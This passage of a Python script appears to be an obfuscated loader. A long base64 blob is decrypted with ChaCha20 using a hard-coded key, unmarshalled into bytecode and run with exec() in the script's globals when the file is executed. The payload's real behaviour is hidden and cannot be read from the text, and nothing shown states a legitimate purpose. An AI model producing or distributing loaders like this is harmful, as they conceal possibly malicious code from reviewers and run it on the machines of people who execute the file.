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" |
| 9 | |
| 10 | def _run(): |
| 11 | try: |
| 12 | _k = bytes.fromhex(_k_hex) |
| 13 | _raw = base64.b64decode(_p_b64) |
| 14 | _n = _raw[:12] |
| 15 | _ct = _raw[12:] |
| 16 | _cipher = ChaCha20.new(key=_k, nonce=_n) |
| 17 | _dec = _cipher.decrypt(_ct) |
| 18 | code = marshal.loads(_dec) |
| 19 | exec(code, globals()) |
| 20 | |
| 21 | except ValueError as ve: |
| 22 | print("Error: Integrity check failed or bad key.") |
| 23 | except EOFError: |
| 24 | print("Error: Marshal data corrupted (possibly wrong Python version).") |
| 25 | except Exception as e: |
| 26 | print(f"Error execution: {e}") |
| 27 | |
| 28 | if __name__ == "__main__": |
| 29 | _run() |